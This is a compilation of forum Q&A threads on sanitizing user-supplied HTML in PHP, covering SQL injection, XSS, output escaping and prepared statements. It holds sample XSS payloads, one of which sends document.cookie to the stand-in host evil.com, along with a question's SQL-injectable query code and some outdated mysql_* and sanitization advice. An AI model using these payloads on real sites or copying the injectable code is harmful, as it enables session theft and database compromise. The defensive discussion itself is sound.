Saving HTML in database - htmlentities [duplicate] - php

This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
Best way to prevent SQL Injection in PHP
On my site, users sometimes need to save HTML content to the database. What is a safe way to do this? I don't want to endanger the database, or the users who later see that content when it is read back from the database.
So what I have read is:
Use htmlentities to save data in database, and html_entity_decode to decode data from database. Is this safe enough, or should I use something else?

Provided you're using string escaping and/or prepared statements, HTML markup can't cause any damage to your database. The danger with HTML markup comes when you display it to the user: if someone has injected unsavory HTML into the markup you're going to display, you've got an XSS attack on your hands.
If you're not escaping or using prepared statements, then pretty much any data that comes from outside can be dangerous.
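To make the point above concrete, here is a minimal sketch (not from the original answers) showing that the htmlentities / html_entity_decode round trip from the question simply returns the original markup, so on its own it adds no protection. The variable names and the sample payload are assumptions for illustration; encoding once at output time with htmlspecialchars is what actually neutralizes the markup.

```php
<?php
// Hypothetical user input containing markup (illustrative only).
$userHtml = '<script>alert("xss")</script><b>hello</b>';

// Encoding before saving and decoding after loading cancels out.
$saved   = htmlentities($userHtml, ENT_QUOTES, 'UTF-8');
$decoded = html_entity_decode($saved, ENT_QUOTES, 'UTF-8');
$roundTripIsNoOp = ($decoded === $userHtml);

// Encoding at the point of output makes the browser show the markup as text.
$safeForPage = htmlspecialchars($userHtml, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

echo $safeForPage, "\n";
```

If the HTML really has to be rendered as HTML rather than shown as text, escaping is not enough and a whitelist-based filter is needed instead.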

You might want to look at the PHP function mysql_real_escape_string() ... More in this post: strip_tags enough to remove HTML from string?
Here's an example ...
// scrub string ... call with sanitize($blah,1) to allow HTML
// note: the mysql_* extension was removed in PHP 7.0; on current PHP, use prepared statements instead
function sanitize( $val, $html=0 ) {
    if (is_array($val)) {
        // sanitize each element recursively
        foreach ($val as $k=>$v) $val[$k] = sanitize($v, $html);
        return $val;
    } else {
        $val = trim( $val );
        if (!$html) {
            $val = strip_tags($val);
            $pat = array("\r\n", "\n\r", "\n", "\r");
            $val = str_replace($pat, '<br>', $val); // newlines to <br>
            $pat = array('/^\s+/', '/\s{2,}/', '/\s+$/');
            $rep = array('', ' ', '');
            $val = preg_replace($pat, $rep, $val); // remove multiple whitespaces
        }
        return mysql_real_escape_string($val); // escape stuff
    }
}

Related

What kind of security loopholes could this creative way of sanitizing input, possibly face? (if any)

The standard way of sanitizing input would be to use commands such as
$url = preg_replace('|[^a-z0-9-~+_.?#=!&;,/:%#$\|*\'()\\x80-\\xff]|i', '', $url);
$strip = array('%0d', '%0a', '%0D', '%0A');
preg_replace("/[^A-Za-z0-9 ]/", '', $string);
echo htmlentities($str);
However, I like it when my users are able to use nice things like parentheses, carets, quotes, etc. in their inputs (comments, usernames, and so on). Since HTML renders codes such as &#40; into symbols such as (, I was hoping to use this alternative approach to sanitizing their input.
Before I embarked on writing a function to do this for possibly harmful characters such as ( or ; or < (so injections such as sneaky eval() or <text/javascript> would not work) I tried searching up previous people's attempts at doing this type of sanitization.
I found none.
This makes me think that I must be clearly overlooking some incredibly obvious security flaw in my "creative" sanitization method.
I will not be using this function as the primary way to protect my MySQL database. I have the new mysqli class for that. Adding this sanitization on top of the mysqli separation of input & query seems like a nice idea, though.
I am using a completely different function to clean up URLs. Those require a different approach.
This function will be used for user input to be displayed on the page, though.
So .... what could I possibly be missing? I KNOW there's gotta be something wrong with this idea since no one else uses it, right?! Is it possible to "re-render the rendered text" or something else horrific and obvious? My pretty little function so far:
Takes input strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
function santitize_data($data) {
    // split the string into single characters
    // do a replacement for each character separately. Only do one replacement.
    // dont do it with preg_replace because that function applies the patterns one after another
    // and replaces already-replaced characters, resulting in horrific mishmash.
    // put it back together with implode
    $patterns = array();
    $patterns[0] = "'";
    $patterns[1] = '"';
    $patterns[2] = '!';
    $patterns[3] = '\\';
    $patterns[4] = '#';
    $patterns[5] = '%';
    $patterns[6] = '&';
    $patterns[7] = '$';
    $patterns[8] = '(';
    $patterns[9] = ')';
    $patterns[10] = '/';
    $patterns[11] = ':';
    $patterns[12] = ';';
    $patterns[13] = '|';
    $patterns[14] = '<';
    $patterns[15] = '>';
    $patterns[16] = '{';
    $patterns[17] = '}';
    $replacements = array();
    $replacements[0] = '&#39;';
    $replacements[1] = '&#34;';
    $replacements[2] = '&#33;';
    $replacements[3] = '&#92;';
    $replacements[4] = '&#35;';
    $replacements[5] = '&#37;';
    $replacements[6] = '&#38;';
    $replacements[7] = '&#36;';
    $replacements[8] = '&#40;';
    $replacements[9] = '&#41;';
    $replacements[10] = '&#47;';
    $replacements[11] = '&#58;';
    $replacements[12] = '&#59;';
    $replacements[13] = '&#124;';
    $replacements[14] = '&#60;';
    $replacements[15] = '&#62;';
    $replacements[16] = '&#123;';
    $replacements[17] = '&#125;';
    $split_data = str_split($data);
    foreach ($split_data as &$value) {
        // loop over every pattern, including the last one
        for ($i = 0; $i < count($patterns); $i++) {
            //testing
            //echo '<br> i='.$i.' value='.$value.' patterns[i]='.$patterns[$i].' replacements[i]='.$replacements[$i].'<br>';
            if ($value == $patterns[$i]) {
                $value = $replacements[$i];
                break; // only one replacement per character
            }
        }
    }
    unset($value); // break the reference with the last element
    $data = implode($split_data);
    //a bit of commented out code .. was using what seemed more logical before ... preg_replace .. but it parses the string in multiple passes ):
    //$data = preg_replace($patterns, $replacements, $data);
    return $data;
} //---END function definition of santitize_data
Spits out result strings like meep&#39;&#59;&#41; drop table or
alert&#40;eval&#40;&#39;document.body.inne&#39; + &#39;rHTML&#39;&#41;&#41;&#59;
and the user sees these things rendered in the browser like meep';) drop table and
alert(eval('document.body.inne' + 'rHTML'));
Without analyzing your code I can tell you that there is a high probability that you've overlooked something that an attacker could use to inject their own code.
The main threat here is XSS - you shouldn't need to "sanitize" to insert data into a database. You either use parameterised queries or you correctly encode characters that the database query language confers special meaning to at the point of entry into your database (e.g. ' character). XSS is normally dealt with by encoding at the point of output, however if you want to allow rich text then you need to take a different approach which is what I believe you are looking to achieve here.
Remember there is no magic function that sanitizes input in a generic manner - it very much depends on how and where it is used to determine whether it is safe or not in that context. (This bit added so if anyone searches and finds this answer then they are up to speed - I think you're already on top of this though.)
Complexity is the main enemy of security. If you cannot determine whether your code is safe or not it is too complicated and a sufficiently motivated attacker with enough time will find a way round your sanitization methods.
What can you do about this?
If you want to allow your users to enter rich text, you could either support BBCode, which lets users insert a limited, safe subset of HTML via your own conversion functions, or you could allow HTML entry and run the content through a tried and tested solution such as HTML Purifier. Now, HTML Purifier won't be perfect and I'm sure that (another) flaw will be found in it at some point in the future.
How to guard against this?
If you implement a Content Security Policy on your site, this will prevent any successfully injected script code from executing in the browser. Check current browser support for CSP before relying on it. Don't be tempted to use just one of these methods: a good security model has layered security, so if one control is circumvented, another can catch it.
Google have now implemented CSP in Gmail to ensure any HTML email received cannot try anything sneaky to launch an XSS attack.
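As a rough illustration of the layered approach described above, the sketch below builds a Content-Security-Policy header value that only allows scripts from the site's own origin. The helper name build_csp and the chosen directives are assumptions, not part of the original answer; a real policy has to be tuned to the resources your pages actually load.

```php
<?php
// Hypothetical helper: turn a directive => sources map into a CSP header value.
function build_csp(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = $name . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

$policy = build_csp([
    'default-src' => ["'self'"],
    'script-src'  => ["'self'"],  // no 'unsafe-inline', so injected inline scripts are refused
    'object-src'  => ["'none'"],
]);

// In a web request this would be sent before any output:
// header('Content-Security-Policy: ' . $policy);
echo $policy, "\n";
```

The policy is a second line of defence; output encoding or HTML filtering is still needed for browsers that do not enforce it.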

Sanitizing Output To Textarea From XSS

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think I would prefer a combination of filter_var and urldecode if you want a simple, pure-PHP solution.
Reason
Imagine an input like this:
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If I use strip_tags
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
If I use htmlspecialchars
var_dump(htmlspecialchars($maliciousCode));
Output
string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)
My Choice
function cleanData($str) {
    $str = urldecode($str); // decode URL-encoded payloads first
    // note: FILTER_SANITIZE_STRING is deprecated as of PHP 8.1
    $str = filter_var($str, FILTER_SANITIZE_STRING);
    $str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
    return $str;
}
$input = cleanData($maliciousCode);
var_dump($input);
Output
string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)
If the form uses GET instead of POST, a URL-encoded payload can still slip through, which is why the function calls urldecode first. This way you keep a minimal amount of information and make sure the final text is harmless.
There are also plenty of classes online to help you filter input; see:
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
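For the textarea case in the question, a minimal sketch of escaping at output might look like this. The function name textarea_field and its parameters are hypothetical; the point is only that htmlspecialchars turns the closing </textarea> in the payload into inert text, while the browser still shows the user the original characters in the field.

```php
<?php
// Hypothetical helper: render a textarea whose content comes from the database.
function textarea_field(string $name, string $value): string
{
    $safeName  = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $safeValue = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<textarea name="' . $safeName . '">' . $safeValue . '</textarea>';
}

// The payload from the question, as it might come back from the database.
$stored = "</textarea><script type='text/javascript'> Malicious Code</script><textarea>";
$field = textarea_field('comment', $stored);
echo $field, "\n";
```

With this approach the value can be stored unmodified and is encoded only at the moment it is written into the page.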
After getting a dirty spammer on my contact form, I expanded my function that sanitizes textbox user input. It now also covers multi-line textarea input.
I needed to format the text for normal display and also for HTML email from my contact page.
It also gives the option to format for a plain-text email, which I also use.
function clean_text($text, $html = true)
{
    if ($text == "") { return ""; }
    $text = nl2br($text, false); // false gives <br>, true gives <br />
    $textary = explode("<br>", $text);
    foreach ($textary as $key => $val) {
        $val = trim($val);
        $val = stripslashes($val);
        $val = htmlspecialchars($val);
        $textary[$key] = $val;
    }
    if ($html) {
        return implode("<br />", $textary); // return implode("<br>",$textary);
    } else {
        return implode("\r\n", $textary);
    }
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php

Is this enough for a secure site? (4 small functions) [duplicate]

This question already has answers here:
Closed 11 years ago.
Possible Duplicate:
PHP: the ultimate clean/secure function
I revised my site's security filters today. I used to filter input and do nothing with the output.
Here it is:
All user inputted variables go through these 2 functions depending on the type:
PS: Since I didn't start coding from scratch, I did it for all variables, including the ones that aren't used in queries. I understand that this is a performance killer and will be undoing that. Better safe than sorry, right?
// numbers (I expect very large numbers)
function intfix($i)
{
    $i = preg_replace('/[^\d]/', '', $i);
    if (!strlen($i))
        $i = 0;
    return $i;
}
// escape non-numbers
function textfix($value) {
    $value = mysql_real_escape_string($value);
    return $value;
}
XSS preventing:
Input - filters user submitted text, like posts and messages. As you see it's currently empty. Not sure if strip_tags is needed.
Output - on all html outputs
function input($input){
    //$input = strip_tags($input, "");
    return $input;
}
function output($bbcode){
    $bbcode = textWrap($bbcode); // textwrap breaks long words
    $bbcode = htmlentities($bbcode,ENT_QUOTES,"UTF-8");
    $bbcode = str_replace("\n", "<br />", $bbcode);
    // then some bbcode (removed) and the img tag
    $urlmatch = "([a-zA-Z]+[:\/\/]+[A-Za-z0-9\-_]+\\.+[A-Za-z0-9\.\/%&=\?\-_]+)";
    $match["img"] = "/\[img\]".$urlmatch."\[\/img\]/is";
    $replace["img"] = "<center><img src=\"$1\" class=\"max\" /></center>";
    return $bbcode;
}
I included the img tag because it could be vulnerable to XSS...
What do you think? Anything obviously wrong? Good enough?
Looks OK, but you could easily make one function for both text and ints that first checks the type and then acts on it.

Insert html/text to mysql

I am using TinyMCE to allow users to edit the content of certain pages. The problem is that I need to store HTML tags, along with attributes such as class="", and so on.
How should I defend the application against SQL injection and still store the HTML tags? (The main problem is the " characters, which mess up the MySQL query.)
In a nutshell, I don't know how to pass $_POST["text"] (which is text) to the insert_to_content() function.
$html = "";
$url = "";
if (isset($_GET["page"])) {
    $url = safesql($_GET["page"]);
}
$sqlSelectPageText = mysql_query('SELECT * FROM content WHERE name="'.$url.'" LIMIT 1');
$pageText = mysql_fetch_array($sqlSelectPageText);
$sqlSelectPageText = "";
if (isset($_GET["edit"]) and isset($_POST["text"])) {
    insert_to_content($url,I_SHOULD_DO_SOMTHG_WAAA($_POST["text"]));
    header('Location: admin.php?page='.$url);
}
$html .= '<div id="editor1div">';
$html .= '<form action="admin.php?page='.$url.'&edit" method="post">';
$html .= ' <input class="formsSubmit" type="image" src="images/yep2.png" alt="Save" />';
$html .= '<p>Content:</p>';
$html .= ' <textarea id="editor1" name="text">';
$html .= ' '.$pageText["text"];
$pageText = "";
$html .= ' </textarea>';
$html .= '</form>';
$html .= '</div>';
echo $html;
function insert_to_content($whatPage, $text) {
    if (mysql_query('UPDATE content SET text="'.$text.'", lastdate=NOW() WHERE name="'.$whatPage.'"')) {
        return true;
    } else {
        return false;
    }
}
function I_SHOULD_DO_SOMTHG_WAAA($text) {
    //what should i do with it?
}
EDIT:
@CaNNaDaRk:
I am trying to use your approach, but I have never used PDO (or OOP PHP). Is it possible that I don't have this class? :D "Class 'PDO' not found in.."
$db = new PDO("mysql:host=$sqlHost;dbname=$sqlDb;$sqlUser,$sqlPass");
$stmt = $db->prepare('UPDATE content SET text=:text, lastdate=NOW() WHERE name=:name');
$stmt->execute( array(':text' => $html, ':name' => $whatPage ) );
It's not only the TinyMCE text but rather your whole script that may lead to SQL injections. Either use mysql_real_escape_string for every parameter you insert into your query, or consider using prepared statements, for example via PDO.
Use of prepared statements can prevent injection and help you with the " issue.
A little example based on your code:
$stmt = $db->prepare('UPDATE content SET text=:text, lastdate=NOW() WHERE name=:name');
$stmt->execute( array(':text' => $html, ':name' => $whatPage ) );
Execute method also returns bool so you don't have to change your code much.
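A fuller, self-contained sketch of the same idea follows. It is only an illustration under stated assumptions: an in-memory SQLite database stands in for the MySQL server so the example can run on its own, the table layout is guessed from the question's queries, and insert_to_content takes the connection as an extra argument. With MySQL, the user name and password are passed as separate constructor arguments, as shown in the comment. The "Class 'PDO' not found" error from the question usually suggests that the PDO extension is not enabled in that PHP installation.

```php
<?php
// Assumption: SQLite in memory replaces MySQL here. A MySQL connection would look like:
// $db = new PDO("mysql:host=$sqlHost;dbname=$sqlDb;charset=utf8mb4", $sqlUser, $sqlPass);
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE content (name TEXT PRIMARY KEY, text TEXT, lastdate TEXT)');
$db->exec("INSERT INTO content (name, text) VALUES ('home', '')");

// Placeholders keep the HTML (quotes included) out of the SQL text entirely.
function insert_to_content(PDO $db, string $whatPage, string $text): bool
{
    $stmt = $db->prepare('UPDATE content SET text = :text, lastdate = :now WHERE name = :name');
    return $stmt->execute([
        ':text' => $text,
        ':now'  => date('Y-m-d H:i:s'),
        ':name' => $whatPage,
    ]);
}

$html = '<p class="intro">It\'s "quoted" HTML</p>';
$ok = insert_to_content($db, 'home', $html);

// Read the row back to confirm the markup was stored unchanged.
$stmt = $db->prepare('SELECT text FROM content WHERE name = :name');
$stmt->execute([':name' => 'home']);
$stored = $stmt->fetchColumn();
```

Because the values travel separately from the query, no I_SHOULD_DO_SOMTHG_WAAA-style escaping step is needed before the update.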
Use mysql_real_escape_string() as suggested.
When displaying content, use htmlspecialchars(), including when adding content into the textarea, to prevent XSS.
You basically need different quoting for html/sql target formats. There is nothing like "universal quoting". When quoting, you always quote text for some particular output, like:
string value for mysql query
like expression for mysql query
html code
json
mysql regular expression
php regular expression
For each case, you need different quoting, because each usage is present within different syntax context. This also implies that the quoting shouldn't be made at the input into PHP, but at the particular output! Which is the reason why features like magic_quotes_gpc are broken (never forget to handle it, or better, assure it is switched off!!!).
So, what methods would one use for quoting in these particular cases? (Feel free to correct me, there might be more modern methods, but these are working for me)
string value for mysql query: mysql_real_escape_string($str)
like expression for mysql query: mysql_real_escape_string(addcslashes($str, "%_"))
html code: htmlspecialchars($str)
json: json_encode() - only for utf8! I use my function for iso-8859-2
mysql regular expression: mysql_real_escape_string(addcslashes($str, '^.[]$()|*+?{}')) - you cannot use preg_quote in this case because backslash would be escaped two times!
php regular expression: preg_quote()
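The idea that each output context needs its own quoting can be sketched with the functions listed above that do not need a database connection. The sample values and variable names are made up for illustration.

```php
<?php
// Illustrative values only; each target context gets its own quoting function.
$forHtml  = htmlspecialchars('<a href="x">T&C</a>', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
$forJson  = json_encode('say "hi"');
$forLike  = addcslashes('50%_off', '%_');   // LIKE wildcards only; SQL string quoting is still needed
$forRegex = '/^' . preg_quote('a.b*c', '/') . '$/';

echo $forHtml, "\n", $forJson, "\n", $forLike, "\n", $forRegex, "\n";
```

Note that none of these results is interchangeable: text quoted for one context is not safe in another.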

Replacing words with tag links in PHP

I have a text ($text) and an array of words ($tags). These words in the text should be replaced with links to other pages without breaking the existing links in the text. In CakePHP there is a method in TextHelper for doing this, but it is broken: it breaks the existing HTML links in the text. The method is supposed to work like this:
$text=Text->highlight($text,$tags,'\1',1);
Below there is existing code in CakePHP TextHelper:
function highlight($text, $phrase, $highlighter = '<span class="highlight">\1</span>', $considerHtml = false) {
    if (empty($phrase)) {
        return $text;
    }
    if (is_array($phrase)) {
        $replace = array();
        $with = array();
        foreach ($phrase as $key => $value) {
            $key = $value;
            $value = $highlighter;
            $key = '(' . $key . ')';
            if ($considerHtml) {
                $key = '(?![^<]+>)' . $key . '(?![^<]+>)';
            }
            $replace[] = '|' . $key . '|ix';
            $with[] = empty($value) ? $highlighter : $value;
        }
        return preg_replace($replace, $with, $text);
    } else {
        $phrase = '(' . $phrase . ')';
        if ($considerHtml) {
            $phrase = '(?![^<]+>)' . $phrase . '(?![^<]+>)';
        }
        return preg_replace('|'.$phrase.'|i', $highlighter, $text);
    }
}
You can see (and run) this algorithm here:
http://www.exorithm.com/algorithm/view/highlight
It can be made a little better and simpler with a few changes, but it still isn't perfect. Though less efficient, I'd recommend one of Ben Doom's solutions.
Replacing text in HTML is fundamentally different than replacing plain text. To determine whether text is part of an HTML tag requires you to find all the tags in order not to consider them. Regex is not really the tool for this.
I would attempt one of the following solutions:
Find the positions of all the words. Working from last to first, determine if each is part of a tag. If not, add the anchor.
Split the string into blocks. Each block is either a tag or plain text. Run your replacement(s) on the plain text blocks, and re-assemble.
I think the first one is probably a bit more efficient, but more prone to programmer error, so I'll leave it up to you.
If you want to know why I'm not approaching this problem directly, look at all the questions on the site about regex and HTML, and how regex is not a parser.
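The second suggestion (split into tag and text blocks, replace only in the text blocks) could be sketched roughly as follows. This is an assumption-laden illustration, not the answerer's code: the function name link_tags, the /tags/ URL prefix, and the simple tag pattern are all made up, and the pattern will misfire on markup with a ">" inside an attribute value, so a real HTML parser is more robust.

```php
<?php
// Hypothetical helper: link each tag word, but only inside plain-text blocks
// that are not already part of an existing <a>...</a> link.
function link_tags(string $html, array $tags, string $urlPrefix = '/tags/'): string
{
    if ($tags === []) {
        return $html;
    }
    // Even indexes are text blocks, odd indexes are the captured tags.
    $blocks = preg_split('/(<[^>]*>)/', $html, -1, PREG_SPLIT_DELIM_CAPTURE);
    $quoted = array_map(function ($t) { return preg_quote($t, '/'); }, $tags);
    $pattern = '/\b(' . implode('|', $quoted) . ')\b/i';
    $insideLink = false;
    foreach ($blocks as $i => $block) {
        if ($i % 2 === 1) {
            // Track whether we are between <a ...> and </a>.
            if (preg_match('/^<a\b/i', $block)) {
                $insideLink = true;
            } elseif (preg_match('/^<\/a\s*>/i', $block)) {
                $insideLink = false;
            }
            continue;
        }
        if ($insideLink || $block === '') {
            continue;
        }
        $blocks[$i] = preg_replace_callback($pattern, function ($m) use ($urlPrefix) {
            $href = $urlPrefix . rawurlencode(strtolower($m[1]));
            return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">' . $m[1] . '</a>';
        }, $block);
    }
    return implode('', $blocks);
}

$out = link_tags('<a href="/php">php</a> and PHP in <b title="php">bold</b>', ['php']);
echo $out, "\n";
```

Only the free-standing "PHP" is linked; the word inside the existing link and the one inside the title attribute are left alone.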
This code works just fine. What you may need to do is check the CSS for the <span class="highlight"> and make sure it is set to some color that will allow you to distinguish that it is highlighted.
.highlight { background-color: #FFE900; }
Amorphous - I noticed Gert edited your post. Are the two code fragments exactly as you posted them?
So even though the original code was designed for highlighting, I understand you're trying to repurpose it for generating links - it should, and does work fine for that (tested as posted).
HOWEVER escaping in the first code fragment could be an issue.
$text=Text->highlight($text,$tags,'\1',1);
Works fine... but if you use double quotes (speech marks) rather than single quotes, the backslash is treated as an escape character and disappears, so you need to escape it. If you don't, you get %01 links.
The correct way with double quotes is:
$text=Text->highlight($text,$tags,"\\1",1);
(Notice the use of \\1 instead of \1)
